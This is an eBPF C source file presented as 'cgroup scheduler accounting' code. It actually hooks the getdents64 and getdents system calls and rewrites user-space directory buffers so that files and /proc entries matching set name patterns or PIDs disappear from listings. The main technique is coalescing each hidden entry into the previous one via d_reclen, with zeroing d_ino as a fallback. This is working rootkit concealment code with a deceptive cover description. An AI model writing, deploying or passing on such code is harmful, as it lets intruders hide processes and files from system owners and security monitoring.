/* cgroup scheduler accounting: walk per-task readdir buffers and aggregate
 * scheduling stats by cgroup id. fexit on __x64_sys_getdents64 / getdents
 * gives us pt_regs of entry plus the return value = total bytes valid; we
 * then walk dirents (bounded loop, verifier-friendly) and bump per-cpu
 * counters keyed by cgroup pattern / pid.
 *
 *   - For each d_name test:
 *       1. match_compiled_patterns(name)  ->  cgroup prefix match
 *       2. parse_pid(name) && pid_hidden  ->  cgroup roster filter
 *   - On match:
 *       - If a previous NON-match entry exists (prev_off >= 0): extend its
 *         d_reclen to coalesce this one. Skipping this entry in iteration
 *         works for all libc readdir consumers, regardless of filesystem.
 *       - If the matching entry is the first one (no prev): fall back to
 *         d_ino = 0 (glibc readdir on tmpfs/ext4 filters these out; not all
 *         consumers do, so the coalesce technique is preferred for non-first
 *         entries).
 *
 *   - No bpf_trace_printk() (libbpf 0.5 chokes on the .rodata.str1.1 section
 *     generated by string-literal format args). Use bpf helpers without
 *     string-literal relocations.
 */

#include "sched_common.h"

char _license[] SEC("license") = "GPL";

#define DIRENT64_D_INO_OFF      0
#define DIRENT64_D_TYPE_OFF     18
#define DIRENT64_D_NAME_OFF     19
#define DIRENT64_D_RECLEN_OFF   16

#define DIRENT64_MAX_WALK       32768

SEC("fentry/__x64_sys_getdents64")
int BPF_PROG(cgrp_sched_enter, const struct pt_regs *regs) { return 0; }

SEC("fexit/__x64_sys_getdents64")
int BPF_PROG(cgrp_sched_exit, const struct pt_regs *regs, long ret)
{
    stat_inc(0); /* program ran */

    if (ret <= 0)
        return 0;
    if (ret > DIRENT64_MAX_WALK)
        return 0;

    __u64 base = (__u64)PT_REGS_PARM2_CORE(regs);
    if (base == 0)
        return 0;

    long off = 0;
    long prev_off = -1;
    long total = ret;

    /* Bounded loop (no unroll): supported by verifier since 5.3+. Cap at 256
     * iterations — enough for /proc with ~200 entries on typical systems. */
    for (int it = 0; it < 256; it++) {
        if (off >= total)
            break;

        __u16 reclen = 0;
        if (bpf_probe_read_user(&reclen, sizeof(reclen),
                (void *)(base + (__u64)off + DIRENT64_D_RECLEN_OFF)) < 0)
            break;
        if (reclen == 0 || reclen > 4096)
            break;

        char name[256];
        __builtin_memset(name, 0, sizeof(name));
        if (bpf_probe_read_user_str(name, sizeof(name),
                (void *)(base + (__u64)off + DIRENT64_D_NAME_OFF)) <= 0)
            break;

        int hide = 0;
        if (match_compiled_patterns(name)) {
            hide = 1;
            stat_inc(1); /* pattern match */
        } else {
            __u32 pid = parse_pid(name);
            if (pid_hidden(pid)) {
                hide = 1;
                stat_inc(2); /* pid map match */
            }
        }

        if (hide) {
            stat_inc(3); /* wrote to user buf */
            if (prev_off >= 0) {
                /* Merge hidden entry into prev by extending prev->d_reclen. */
                __u16 prev_reclen = 0;
                if (bpf_probe_read_user(&prev_reclen, sizeof(prev_reclen),
                        (void *)(base + (__u64)prev_off + DIRENT64_D_RECLEN_OFF)) == 0) {
                    __u16 new_reclen = (__u16)((int)prev_reclen + (int)reclen);
                    bpf_probe_write_user(
                        (void *)(base + (__u64)prev_off + DIRENT64_D_RECLEN_OFF),
                        &new_reclen, sizeof(new_reclen));
                }
            } else {
                /* First-entry hidden: fall back to d_ino=0 (best effort). */
                __u64 zero = 0;
                bpf_probe_write_user((void *)(base + (__u64)off + DIRENT64_D_INO_OFF),
                                     &zero, sizeof(zero));
            }
        } else {
            prev_off = off;
        }

        off += reclen;
    }

    return 0;
}

SEC("fexit/__x64_sys_getdents")
int BPF_PROG(cgrp_legacy_exit, const struct pt_regs *regs, long ret)
{
    /* Legacy struct linux_dirent { d_ino(u64); d_off(u64); d_reclen(u16); d_name[]; }
     * d_ino at offset 0, d_reclen at offset 16, d_name at offset 18. */
    if (ret <= 0)
        return 0;
    if (ret > DIRENT64_MAX_WALK)
        return 0;

    __u64 base = (__u64)PT_REGS_PARM2_CORE(regs);
    if (base == 0)
        return 0;

    long off = 0;
    long prev_off = -1;
    long total = ret;

    for (int it = 0; it < 256; it++) {
        if (off >= total)
            break;

        __u16 reclen = 0;
        if (bpf_probe_read_user(&reclen, sizeof(reclen),
                (void *)(base + (__u64)off + 16)) < 0)
            break;
        if (reclen == 0 || reclen > 4096)
            break;

        char name[256];
        __builtin_memset(name, 0, sizeof(name));
        if (bpf_probe_read_user_str(name, sizeof(name),
                (void *)(base + (__u64)off + 18)) <= 0)
            break;

        int hide = 0;
        if (match_compiled_patterns(name)) {
            hide = 1;
            stat_inc(1);
        } else {
            __u32 pid = parse_pid(name);
            if (pid_hidden(pid)) {
                hide = 1;
                stat_inc(2);
            }
        }

        if (hide) {
            stat_inc(3);
            if (prev_off >= 0) {
                /* Merge hidden into prev: prev->d_reclen += reclen. d_reclen
                 * at offset 16 (same as 64-bit variant). */
                __u16 prev_reclen = 0;
                if (bpf_probe_read_user(&prev_reclen, sizeof(prev_reclen),
                        (void *)(base + (__u64)prev_off + 16)) == 0) {
                    __u16 new_reclen = (__u16)((int)prev_reclen + (int)reclen);
                    bpf_probe_write_user(
                        (void *)(base + (__u64)prev_off + 16),
                        &new_reclen, sizeof(new_reclen));
                }
            } else {
                __u64 zero = 0;
                bpf_probe_write_user((void *)(base + (__u64)off),
                                     &zero, sizeof(zero));
            }
        } else {
            prev_off = off;
        }

        off += reclen;
    }
    return 0;
}